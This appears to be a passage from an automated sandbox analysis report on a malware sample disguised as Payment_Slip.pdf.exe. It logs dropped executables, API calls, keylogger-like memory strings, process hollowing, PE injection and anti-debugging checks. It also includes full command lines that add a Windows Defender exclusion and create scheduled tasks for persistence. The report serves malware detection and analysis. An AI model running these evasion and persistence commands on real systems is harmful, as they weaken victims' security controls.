Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040AC78

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406D28

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Code function: 14_2_00418981 memset,GetSystemInfo,

14_2_00418981

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Thread delayed: delay time: 595250

Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0{?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: E6m03XlgugbphGFSZxI
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2826846976.000001F041652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.2826136324.000001F03C02B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP`eA
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: Windows Update.exe, 0000001A.00000002.3641937968.0000000006060000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.0000000000745000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1239687916.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3611941996.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3611272951.0000000000752000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3654737637.0000000006330000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\conserver.exe

Code function: 13_2_0682B960 LdrInitializeThunk,

13_2_0682B960

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_004327AE

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

14_2_0040DD85

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

11_2_0041A8DA

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h]		11_2_004407B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004407B5 mov eax, dword ptr fs:[00000030h]		17_2_004407B5

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

11_2_00410763

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004327AE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004328FC SetUnhandledExceptionFilter,	11_2_004328FC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004398AC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00432D5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_004327AE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004328FC SetUnhandledExceptionFilter,	17_2_004328FC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_004398AC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00432D5C

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Memory written: C:\Users\user\Desktop\Payment_Slip.pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Memory written: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Section unmapped: C:\Windows\SysWOW64\schtasks.exe base address: 400000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		11_2_00410B5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe		17_2_00410B5C

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_004175E1 mouse_event,

11_2_004175E1

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"	Jump to behavior

Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFD\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r@\
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}TH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>r
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-
